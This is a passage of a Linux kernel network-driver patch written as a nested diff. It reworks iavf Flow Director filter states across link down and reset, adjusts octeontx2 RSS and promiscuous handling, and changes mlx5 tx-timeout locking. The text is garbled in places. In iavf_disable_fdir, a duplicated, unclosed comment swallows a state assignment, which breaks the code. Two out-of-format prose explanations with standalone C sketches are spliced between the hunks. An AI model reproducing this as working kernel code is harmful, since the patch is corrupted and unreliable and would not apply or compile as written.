+ 		if (fltr->state == IAVF_FDIR_FLTR_ACTIVE) {
+ 			fltr->state = IAVF_FDIR_FLTR_DEL_REQUEST;
+ 			adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
++		} else if (fltr->state == IAVF_FDIR_FLTR_INACTIVE) {
++			list_del(&fltr->list);
++			kfree(fltr);
++			adapter->fdir_active_fltr--;
++			fltr = NULL;
+ 		} else {
+ 			err = -EBUSY;
+ 		}
+@@ -1782,7 +1791,7 @@ static int iavf_get_rxnfc(struct net_device *netdev, struct ethtool_rxnfc *cmd,
+ 		ret = 0;
+ 		break;
+ 	case ETHTOOL_GRXCLSRLCNT:
+-		if (!FDIR_FLTR_SUPPORT(adapter))
++		if (!(adapter->flags & IAVF_FLAG_FDIR_ENABLED))
+ 			break;
+ 		spin_lock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->rule_cnt = adapter->fdir_active_fltr;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.h b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+index 9eb9f73f6adf3..d31bd923ba8cb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.h
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.h
+@@ -6,12 +6,25 @@
+ 
+ struct iavf_adapter;
+ 
+-/* State of Flow Director filter */
++/* State of a Flow Director filter
++ *
++ * *_REQUEST states mark a filter to be sent to the PF driver to perform an
++ * action (either add or delete the filter). *_PENDING states indicate that
++ * the request was sent to the PF and the driver is waiting for a response.
++ *
++ * Both the DELETE and DISABLE states are used to delete a filter in the PF.
++ * The difference is that after a successful response, a filter in the
++ * DEL_PENDING state is also deleted from the VF driver, while a filter in
++ * the DIS_PENDING state is changed to the INACTIVE state.
++ */
+ enum iavf_fdir_fltr_state_t {
+ 	IAVF_FDIR_FLTR_ADD_REQUEST,	/* User requests to add filter */
+ 	IAVF_FDIR_FLTR_ADD_PENDING,	/* Filter pending add by the PF */
+ 	IAVF_FDIR_FLTR_DEL_REQUEST,	/* User requests to delete filter */
+ 	IAVF_FDIR_FLTR_DEL_PENDING,	/* Filter pending delete by the PF */
++	IAVF_FDIR_FLTR_DIS_REQUEST,	/* Filter scheduled to be disabled */
++	IAVF_FDIR_FLTR_DIS_PENDING,	/* Filter pending disable by the PF */
++	IAVF_FDIR_FLTR_INACTIVE,	/* Filter inactive on link down */
+ 	IAVF_FDIR_FLTR_ACTIVE,		/* Filter is active */
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 4836bac2bd09d..b9c4b311cd625 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -1368,18 +1368,20 @@ static void iavf_clear_cloud_filters(struct iavf_adapter *adapter)
+  **/
+ static void iavf_clear_fdir_filters(struct iavf_adapter *adapter)
+ {
+-	struct iavf_fdir_fltr *fdir, *fdirtmp;
++	struct iavf_fdir_fltr *fdir;
+ 
+ 	/* remove all Flow Director filters */
+ 	spin_lock_bh(&adapter->fdir_fltr_lock);
+-	list_for_each_entry_safe(fdir, fdirtmp, &adapter->fdir_list_head,
+-				 list) {
++	list_for_each_entry(fdir, &adapter->fdir_list_head, list) {
+ 		if (fdir->state == IAVF_FDIR_FLTR_ADD_REQUEST) {
+-			list_del(&fdir->list);
+-			kfree(fdir);
+-			adapter->fdir_active_fltr--;
+-		} else {
+-			fdir->state = IAVF_FDIR_FLTR_DEL_REQUEST;
++			/* Cancel a request, keep filter as inactive */
++			fdir->state = IAVF_FDIR_FLTR_INACTIVE;
++		} else if (fdir->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++			 fdir->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* Disable filters which are active or have a pending
++			 * request to PF to be added
++			 */
++			fdir->state = IAVF_FDIR_FLTR_DIS_REQUEST;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -4210,6 +4212,33 @@ static int iavf_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 	}
+ }
+ 
++/**
++ * iavf_restore_fdir_filters
++ * @adapter: board private structure
++ *
++ * Restore existing FDIR filters when VF netdev comes back up.
++ **/
++static void iavf_restore_fdir_filters(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *f;
++
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry(f, &adapter->fdir_list_head, list) {
++		if (f->state == IAVF_FDIR_FLTR_DIS_REQUEST) {
++			/* Cancel a request, keep filter as active */
++			f->state = IAVF_FDIR_FLTR_ACTIVE;
++		} else if (f->state == IAVF_FDIR_FLTR_DIS_PENDING ||
++			   f->state == IAVF_FDIR_FLTR_INACTIVE) {
++			/* Add filters which are inactive or have a pending
++			 * request to PF to be deleted
++			 */
++			f->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++			adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++}
++
+ /**
+  * iavf_open - Called when a network interface is made active
+  * @netdev: network interface device structure
+@@ -4277,8 +4306,9 @@ static int iavf_open(struct net_device *netdev)
+ 
+ 	spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
+-	/* Restore VLAN filters that were removed with IFF_DOWN */
++	/* Restore filters that were removed with IFF_DOWN */
+ 	iavf_restore_filters(adapter);
++	iavf_restore_fdir_filters(adapter);
+ 
+ 	iavf_configure(adapter);
+ 
+@@ -4415,6 +4445,49 @@ static int iavf_change_mtu(struct net_device *netdev, int new_mtu)
+ 	return ret;
+ }
+ 
++/**
++ * iavf_disable_fdir - disable Flow Director and clear existing filters
++ * @adapter: board private structure
++ **/
++static void iavf_disable_fdir(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *fdir, *fdirtmp;
++	bool del_filters = false;
++
++	adapter->flags &= ~IAVF_FLAG_FDIR_ENABLED;
++
++	/* remove all Flow Director filters */
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry_safe(fdir, fdirtmp, &adapter->fdir_list_head,
++				 list) {
++		if (fdir->state == IAVF_FDIR_FLTR_ADD_REQUEST ||
++		    fdir->state == IAVF_FDIR_FLTR_INACTIVE) {
++			/* Delete filters not registered in PF */
++			list_del(&fdir->list);
++			kfree(fdir);
++			adapter->fdir_active_fltr--;
++		} else if (fdir->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++			   fdir->state == IAVF_FDIR_FLTR_DIS_REQUEST ||
++			   fdir->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* Filters registered in PF, schedule their deletion */
++			fdir->state = IAVF_FDIR_FLTR_DEL_REQUEST;
++			del_filters = true;
++		} else if (fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++			/* Request to delete filter already sent to PF, change
++			/* A delete request was already sent to the PF; change
++			 * the state to DEL_PENDING so the filter is deleted
++			 * after the PF's response instead of being set INACTIVE
++			fdir->state = IAVF_FDIR_FLTR_DEL_PENDING;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++
++	if (del_filters) {
++		adapter->aq_required |= IAVF_FLAG_AQ_DEL_FDIR_FILTER;
++		mod_delayed_work(adapter->wq, &adapter->watchdog_task, 0);
++	}
++}
++
+ #define NETIF_VLAN_OFFLOAD_FEATURES	(NETIF_F_HW_VLAN_CTAG_RX | \
+ 					 NETIF_F_HW_VLAN_CTAG_TX | \
+ 					 NETIF_F_HW_VLAN_STAG_RX | \
+@@ -4437,6 +4510,13 @@ static int iavf_set_features(struct net_device *netdev,
+ 		iavf_set_vlan_offload_features(adapter, netdev->features,
+ 					       features);
+ 
++	if ((netdev->features & NETIF_F_NTUPLE) ^ (features & NETIF_F_NTUPLE)) {
++		if (features & NETIF_F_NTUPLE)
++			adapter->flags |= IAVF_FLAG_FDIR_ENABLED;
++		else
++			iavf_disable_fdir(adapter);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -4732,6 +4812,9 @@ static netdev_features_t iavf_fix_features(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	if (!FDIR_FLTR_SUPPORT(adapter))
++		features &= ~NETIF_F_NTUPLE;
++
+ 	return iavf_fix_netdev_vlan_features(adapter, features);
+ }
+ 
+@@ -4849,6 +4932,12 @@ int iavf_process_config(struct iavf_adapter *adapter)
+ 	if (vfres->vf_cap_flags & VIRTCHNL_VF_OFFLOAD_VLAN)
+ 		netdev->features |= NETIF_F_HW_VLAN_CTAG_FILTER;
+ 
++	if (FDIR_FLTR_SUPPORT(adapter)) {
++		netdev->hw_features |= NETIF_F_NTUPLE;
++		netdev->features |= NETIF_F_NTUPLE;
++		adapter->flags |= IAVF_FLAG_FDIR_ENABLED;
++	}
++
+ 	netdev->priv_flags |= IFF_UNICAST_FLT;
+ 
+ 	/* Do not turn on offloads when they are requested to be turned off.
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 5a66b05c03222..951ef350323a2 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -1752,8 +1752,8 @@ void iavf_add_fdir_filter(struct iavf_adapter *adapter)
+  **/
+ void iavf_del_fdir_filter(struct iavf_adapter *adapter)
+ {
++	struct virtchnl_fdir_del f = {};
+ 	struct iavf_fdir_fltr *fdir;
+-	struct virtchnl_fdir_del f;
+ 	bool process_fltr = false;
+ 	int len;
+ 
+@@ -1770,11 +1770,16 @@ void iavf_del_fdir_filter(struct iavf_adapter *adapter)
+ 	list_for_each_entry(fdir, &adapter->fdir_list_head, list) {
+ 		if (fdir->state == IAVF_FDIR_FLTR_DEL_REQUEST) {
+ 			process_fltr = true;
+-			memset(&f, 0, len);
+ 			f.vsi_id = fdir->vc_add_msg.vsi_id;
+ 			f.flow_id = fdir->flow_id;
+ 			fdir->state = IAVF_FDIR_FLTR_DEL_PENDING;
+ 			break;
++		} else if (fdir->state == IAVF_FDIR_FLTR_DIS_REQUEST) {
++			process_fltr = true;
++			f.vsi_id = fdir->vc_add_msg.vsi_id;
++			f.flow_id = fdir->flow_id;
++			fdir->state = IAVF_FDIR_FLTR_DIS_PENDING;
++			break;
+ 		}
+ 	}
+ 	spin_unlock_bh(&adapter->fdir_fltr_lock);
+@@ -1918,6 +1923,48 @@ static void iavf_netdev_features_vlan_strip_set(struct net_device *netdev,
+ 		netdev->features &= ~NETIF_F_HW_VLAN_CTAG_RX;
+ }
+ 
++/**
++ * iavf_activate_fdir_filters - Reactivate all FDIR filters after a reset
++ * @adapter: private adapter structure
++ *
++ * Called after a reset to re-add all FDIR filters, and to drop those
++ * that were already pending deletion.
++ */
++static void iavf_activate_fdir_filters(struct iavf_adapter *adapter)
++{
++	struct iavf_fdir_fltr *f, *ftmp;
++	bool add_filters = false;
++
++	spin_lock_bh(&adapter->fdir_fltr_lock);
++	list_for_each_entry_safe(f, ftmp, &adapter->fdir_list_head, list) {
++		if (f->state == IAVF_FDIR_FLTR_ADD_REQUEST ||
++		    f->state == IAVF_FDIR_FLTR_ADD_PENDING ||
++		    f->state == IAVF_FDIR_FLTR_ACTIVE) {
++			/* All filters and requests have been removed in PF,
++			 * restore them
++			 */
++			f->state = IAVF_FDIR_FLTR_ADD_REQUEST;
++			add_filters = true;
++		} else if (f->state == IAVF_FDIR_FLTR_DIS_REQUEST ||
++			   f->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++			/* Link down state, leave filters as inactive */
++			f->state = IAVF_FDIR_FLTR_INACTIVE;
++		} else if (f->state == IAVF_FDIR_FLTR_DEL_REQUEST ||
++			   f->state == IAVF_FDIR_FLTR_DEL_PENDING) {
++			/* Delete filters that were pending to be deleted, the
++			 * list on PF is already cleared after a reset
++			 */
++			list_del(&f->list);
++			kfree(f);
++			adapter->fdir_active_fltr--;
++		}
++	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
++
++	if (add_filters)
++		adapter->aq_required |= IAVF_FLAG_AQ_ADD_FDIR_FILTER;
++}
++
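
After a VF reset the PF side has forgotten every filter, so the hunk above maps each locally tracked state to its post-reset fate. A compact model of that mapping, with shortened state names that only stand in for the driver's:

#include <stdio.h>

enum st { ADD_REQ, ADD_PEND, ACTIVE, DIS_REQ, DIS_PEND,
	  DEL_REQ, DEL_PEND, INACTIVE, FREED };

/* Map each local filter state to what must happen after a reset. */
static enum st after_reset(enum st s)
{
	switch (s) {
	case ADD_REQ:
	case ADD_PEND:
	case ACTIVE:
		return ADD_REQ;		/* re-add everything the PF lost */
	case DIS_REQ:
	case DIS_PEND:
		return INACTIVE;	/* link was down: stay out of the PF */
	case DEL_REQ:
	case DEL_PEND:
		return FREED;		/* PF list is already clear: drop it */
	default:
		return s;
	}
}

int main(void)
{
	printf("%d\n", after_reset(DEL_PEND) == FREED);	/* 1 */
	return 0;
}
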
+ /**
+  * iavf_virtchnl_completion
+  * @adapter: adapter structure
+@@ -2095,7 +2142,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 			spin_lock_bh(&adapter->fdir_fltr_lock);
+ 			list_for_each_entry(fdir, &adapter->fdir_list_head,
+ 					    list) {
+-				if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING) {
++				if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING ||
++				    fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
+ 					fdir->state = IAVF_FDIR_FLTR_ACTIVE;
+ 					dev_info(&adapter->pdev->dev, "Failed to del Flow Director filter, error %s\n",
+ 						 iavf_stat_str(&adapter->hw,
+@@ -2232,6 +2280,8 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 
+ 		spin_unlock_bh(&adapter->mac_vlan_list_lock);
+ 
++		iavf_activate_fdir_filters(adapter);
++
+ 		iavf_parse_vf_resource_msg(adapter);
+ 
+ 		/* negotiated VIRTCHNL_VF_OFFLOAD_VLAN_V2, so wait for the
+@@ -2421,7 +2471,9 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry_safe(fdir, fdir_tmp, &adapter->fdir_list_head,
+ 					 list) {
+ 			if (fdir->state == IAVF_FDIR_FLTR_DEL_PENDING) {
+-				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS) {
++				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS ||
++				    del_fltr->status ==
++				    VIRTCHNL_FDIR_FAILURE_RULE_NONEXIST) {
+ 					dev_info(&adapter->pdev->dev, "Flow Director filter with location %u is deleted\n",
+ 						 fdir->loc);
+ 					list_del(&fdir->list);
+@@ -2433,6 +2485,17 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 						 del_fltr->status);
+ 					iavf_print_fdir_fltr(adapter, fdir);
+ 				}
++			} else if (fdir->state == IAVF_FDIR_FLTR_DIS_PENDING) {
++				if (del_fltr->status == VIRTCHNL_FDIR_SUCCESS ||
++				    del_fltr->status ==
++				    VIRTCHNL_FDIR_FAILURE_RULE_NONEXIST) {
++					fdir->state = IAVF_FDIR_FLTR_INACTIVE;
++				} else {
++					fdir->state = IAVF_FDIR_FLTR_ACTIVE;
++					dev_info(&adapter->pdev->dev, "Failed to disable Flow Director filter with status: %d\n",
++						 del_fltr->status);
++					iavf_print_fdir_fltr(adapter, fdir);
++				}
+ 			}
+ 		}
+ 		spin_unlock_bh(&adapter->fdir_fltr_lock);
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 6105419ae2d5f..9e0e13638c463 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -8822,7 +8822,7 @@ netdev_tx_t ixgbe_xmit_frame_ring(struct sk_buff *skb,
+ 
+ 			if (skb_cow_head(skb, 0))
+ 				goto out_drop;
+-			vhdr = (struct vlan_ethhdr *)skb->data;
++			vhdr = skb_vlan_eth_hdr(skb);
+ 			vhdr->h_vlan_TCI = htons(tx_flags >>
+ 						 IXGBE_TX_FLAGS_VLAN_SHIFT);
+ 		} else {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+index d609512998992..b9a4efb955333 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_devlink.c
+@@ -642,7 +642,7 @@ static int rvu_nix_register_reporters(struct rvu_devlink *rvu_dl)
+ 
+ 	rvu_dl->devlink_wq = create_workqueue("rvu_devlink_wq");
+ 	if (!rvu_dl->devlink_wq)
+-		goto err;
++		return -ENOMEM;
+ 
+ 	INIT_WORK(&rvu_reporters->intr_work, rvu_nix_intr_work);
+ 	INIT_WORK(&rvu_reporters->gen_work, rvu_nix_gen_work);
+@@ -650,9 +650,6 @@ static int rvu_nix_register_reporters(struct rvu_devlink *rvu_dl)
+ 	INIT_WORK(&rvu_reporters->ras_work, rvu_nix_ras_work);
+ 
+ 	return 0;
+-err:
+-	rvu_nix_health_reporters_destroy(rvu_dl);
+-	return -ENOMEM;
+ }
+ 
+ static int rvu_nix_health_reporters_create(struct rvu_devlink *rvu_dl)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index f65805860c8d4..0bcf3e5592806 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -671,6 +671,7 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 	int blkaddr, ucast_idx, index;
+ 	struct nix_rx_action action = { 0 };
+ 	u64 relaxed_mask;
++	u8 flow_key_alg;
+ 
+ 	if (!hw->cap.nix_rx_multicast && is_cgx_vf(rvu, pcifunc))
+ 		return;
+@@ -701,6 +702,8 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 		action.op = NIX_RX_ACTIONOP_UCAST;
+ 	}
+ 
++	flow_key_alg = action.flow_key_alg;
++
+ 	/* RX_ACTION set to MCAST for CGX PF's */
+ 	if (hw->cap.nix_rx_multicast && pfvf->use_mce_list &&
+ 	    is_pf_cgxmapped(rvu, rvu_get_pf(pcifunc))) {
+@@ -740,7 +743,7 @@ void rvu_npc_install_promisc_entry(struct rvu *rvu, u16 pcifunc,
+ 	req.vf = pcifunc;
+ 	req.index = action.index;
+ 	req.match_id = action.match_id;
+-	req.flow_key_alg = action.flow_key_alg;
++	req.flow_key_alg = flow_key_alg;
+ 
+ 	rvu_mbox_handler_npc_install_flow(rvu, &req, &rsp);
+ }
+@@ -854,6 +857,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	u8 mac_addr[ETH_ALEN] = { 0 };
+ 	struct nix_rx_action action = { 0 };
+ 	struct rvu_pfvf *pfvf;
++	u8 flow_key_alg;
+ 	u16 vf_func;
+ 
+ 	/* Only CGX PF/VF can add allmulticast entry */
+@@ -888,6 +892,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 		*(u64 *)&action = npc_get_mcam_action(rvu, mcam,
+ 							blkaddr, ucast_idx);
+ 
++	flow_key_alg = action.flow_key_alg;
+ 	if (action.op != NIX_RX_ACTIONOP_RSS) {
+ 		*(u64 *)&action = 0;
+ 		action.op = NIX_RX_ACTIONOP_UCAST;
+@@ -924,7 +929,7 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	req.vf = pcifunc | vf_func;
+ 	req.index = action.index;
+ 	req.match_id = action.match_id;
+-	req.flow_key_alg = action.flow_key_alg;
++	req.flow_key_alg = flow_key_alg;
+ 
+ 	rvu_mbox_handler_npc_install_flow(rvu, &req, &rsp);
+ }
+@@ -990,11 +995,38 @@ static void npc_update_vf_flow_entry(struct rvu *rvu, struct npc_mcam *mcam,
+ 	mutex_unlock(&mcam->lock);
+ }
+ 
++static void npc_update_rx_action_with_alg_idx(struct rvu *rvu, struct nix_rx_action action,
++					      struct rvu_pfvf *pfvf, int mcam_index, int blkaddr,
++					      int alg_idx)
++{
++	struct npc_mcam *mcam = &rvu->hw->mcam;
++	struct rvu_hwinfo *hw = rvu->hw;
++	int bank, op_rss;
++
++	if (!is_mcam_entry_enabled(rvu, mcam, blkaddr, mcam_index))
++		return;
++
++	op_rss = (!hw->cap.nix_rx_multicast || !pfvf->use_mce_list);
++
++	bank = npc_get_bank(mcam, mcam_index);
++	mcam_index &= (mcam->banksize - 1);
++
++	/* If the Rx action is MCAST, update only the RSS algorithm index */
++	if (!op_rss) {
++		*(u64 *)&action = rvu_read64(rvu, blkaddr,
++				NPC_AF_MCAMEX_BANKX_ACTION(mcam_index, bank));
++
++		action.flow_key_alg = alg_idx;
++	}
++	rvu_write64(rvu, blkaddr,
++		    NPC_AF_MCAMEX_BANKX_ACTION(mcam_index, bank), *(u64 *)&action);
++}
++
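
npc_get_bank() plus the `index &= (mcam->banksize - 1)` mask above split a flat MCAM entry number into a bank and a slot within that bank, which only works when the bank size is a power of two. A hedged sketch of the arithmetic, assuming a 256-entry bank purely for illustration:

#include <assert.h>
#include <stdio.h>

#define BANKSIZE 256u	/* illustrative; must be a power of two */

static unsigned int bank_of(unsigned int index)
{
	return index / BANKSIZE;
}

static unsigned int slot_of(unsigned int index)
{
	return index & (BANKSIZE - 1);	/* same as index % BANKSIZE */
}

int main(void)
{
	unsigned int index = 700;

	assert((BANKSIZE & (BANKSIZE - 1)) == 0);
	printf("entry %u -> bank %u, slot %u\n",
	       index, bank_of(index), slot_of(index));	/* bank 2, slot 188 */
	return 0;
}
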
+ void rvu_npc_update_flowkey_alg_idx(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 				    int group, int alg_idx, int mcam_index)
+ {
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+-	struct rvu_hwinfo *hw = rvu->hw;
+ 	struct nix_rx_action action;
+ 	int blkaddr, index, bank;
+ 	struct rvu_pfvf *pfvf;
+@@ -1050,15 +1082,16 @@ void rvu_npc_update_flowkey_alg_idx(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	/* If PF's promiscuous entry is enabled,
+ 	 * Set RSS action for that entry as well
+ 	 */
+-	if ((!hw->cap.nix_rx_multicast || !pfvf->use_mce_list) &&
+-	    is_mcam_entry_enabled(rvu, mcam, blkaddr, index)) {
+-		bank = npc_get_bank(mcam, index);
+-		index &= (mcam->banksize - 1);
++	npc_update_rx_action_with_alg_idx(rvu, action, pfvf, index, blkaddr,
++					  alg_idx);
+ 
+-		rvu_write64(rvu, blkaddr,
+-			    NPC_AF_MCAMEX_BANKX_ACTION(index, bank),
+-			    *(u64 *)&action);
+-	}
++	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
++					 nixlf, NIXLF_ALLMULTI_ENTRY);
++	/* If PF's allmulti entry is enabled,
++	 * Set RSS action for that entry as well
++	 */
++	npc_update_rx_action_with_alg_idx(rvu, action, pfvf, index, blkaddr,
++					  alg_idx);
+ }
+ 
+ void npc_enadis_default_mce_entry(struct rvu *rvu, u16 pcifunc,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 55807e2043edf..a2d8ac6204054 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1638,6 +1638,21 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 	mutex_unlock(&mbox->lock);
+ }
+ 
++static bool otx2_promisc_use_mce_list(struct otx2_nic *pfvf)
++{
++	int vf;
++
++	/* The AF driver will determine whether to allow the VF netdev or not */
++	if (is_otx2_vf(pfvf->pcifunc))
++		return true;
++
++	/* check if there are any trusted VFs associated with the PF netdev */
++	for (vf = 0; vf < pci_num_vf(pfvf->pdev); vf++)
++		if (pfvf->vf_configs[vf].trusted)
++			return true;
++	return false;
++}
++
+ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ {
+ 	struct net_device *netdev = pf->netdev;
+@@ -1670,7 +1685,8 @@ static void otx2_do_set_rx_mode(struct otx2_nic *pf)
+ 	if (netdev->flags & (IFF_ALLMULTI | IFF_MULTICAST))
+ 		req->mode |= NIX_RX_MODE_ALLMULTI;
+ 
+-	req->mode |= NIX_RX_MODE_USE_MCE;
++	if (otx2_promisc_use_mce_list(pf))
++		req->mode |= NIX_RX_MODE_USE_MCE;
+ 
+ 	otx2_sync_mbox_msg(&pf->mbox);
+ 	mutex_unlock(&pf->mbox.lock);
+@@ -2634,11 +2650,14 @@ static int otx2_ndo_set_vf_trust(struct net_device *netdev, int vf,
+ 	pf->vf_configs[vf].trusted = enable;
+ 	rc = otx2_set_vf_permissions(pf, vf, OTX2_TRUSTED_VF);
+ 
+-	if (rc)
++	if (rc) {
+ 		pf->vf_configs[vf].trusted = !enable;
+-	else
++	} else {
+ 		netdev_info(pf->netdev, "VF %d is %strusted\n",
+ 			    vf, enable ? "" : "not ");
++		otx2_set_rx_mode(netdev);
++	}
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+index bc76fe6b06230..0ee456480a488 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h
+@@ -847,6 +847,7 @@ enum {
+ 	MLX5E_STATE_DESTROYING,
+ 	MLX5E_STATE_XDP_TX_ENABLED,
+ 	MLX5E_STATE_XDP_ACTIVE,
++	MLX5E_STATE_CHANNELS_ACTIVE,
+ };
+ 
+ struct mlx5e_modify_sq_param {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 42e6f2fcf5f59..9910a0480f589 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -2586,6 +2586,7 @@ void mlx5e_close_channels(struct mlx5e_channels *chs)
+ {
+ 	int i;
+ 
++	ASSERT_RTNL();
+ 	if (chs->ptp) {
+ 		mlx5e_ptp_close(chs->ptp);
+ 		chs->ptp = NULL;
+@@ -2865,17 +2866,29 @@ void mlx5e_activate_priv_channels(struct mlx5e_priv *priv)
+ 	if (mlx5e_is_vport_rep(priv))
+ 		mlx5e_rep_activate_channels(priv);
+ 
++	set_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state);
++
+ 	mlx5e_wait_channels_min_rx_wqes(&priv->channels);
+ 
+ 	if (priv->rx_res)
+ 		mlx5e_rx_res_channels_activate(priv->rx_res, &priv->channels);
+ }
+ 
++static void mlx5e_cancel_tx_timeout_work(struct mlx5e_priv *priv)
++{
++	WARN_ON_ONCE(test_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state));
++	if (current_work() != &priv->tx_timeout_work)
++		cancel_work_sync(&priv->tx_timeout_work);
++}
++
+ void mlx5e_deactivate_priv_channels(struct mlx5e_priv *priv)
+ {
+ 	if (priv->rx_res)
+ 		mlx5e_rx_res_channels_deactivate(priv->rx_res);
+ 
++	clear_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state);
++	mlx5e_cancel_tx_timeout_work(priv);
++
+ 	if (mlx5e_is_vport_rep(priv))
+ 		mlx5e_rep_deactivate_channels(priv);
+ 
+@@ -4617,8 +4630,17 @@ static void mlx5e_tx_timeout_work(struct work_struct *work)
+ 	struct net_device *netdev = priv->netdev;
+ 	int i;
+ 
+-	rtnl_lock();
+-	mutex_lock(&priv->state_lock);
++	/* Take rtnl_lock to ensure no change in netdev->real_num_tx_queues
++	 * through this flow. However, channel closing flows have to wait for
++	 * this work to finish while holding rtnl lock too. So either get the
++	 * lock or find that the channels are being closed for another
++	 * reason, in which case this work is no longer relevant.
++	 */
++	while (!rtnl_trylock()) {
++		if (!test_bit(MLX5E_STATE_CHANNELS_ACTIVE, &priv->state))
++			return;
++		msleep(20);
++	}
+ 
+ 	if (!test_bit(MLX5E_STATE_OPENED, &priv->state))
+ 		goto unlock;
+@@ -4637,7 +4659,6 @@ static void mlx5e_tx_timeout_work(struct work_struct *work)
+ 	}
+ 
+ unlock:
+-	mutex_unlock(&priv->state_lock);
+ 	rtnl_unlock();
+ }
+ 
+diff --git a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
+index de8d54b23f738..c005a9df59d1c 100644
+--- a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
++++ b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c
+@@ -1862,7 +1862,7 @@ netxen_tso_check(struct net_device *netdev,
+ 
+ 	if (protocol == cpu_to_be16(ETH_P_8021Q)) {
+ 
+-		vh = (struct vlan_ethhdr *)skb->data;
++		vh = skb_vlan_eth_hdr(skb);
+ 		protocol = vh->h_vlan_encapsulated_proto;
+ 		flags = FLAGS_VLAN_TAGGED;
+ 
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_cxt.c b/drivers/net/ethernet/qlogic/qed/qed_cxt.c
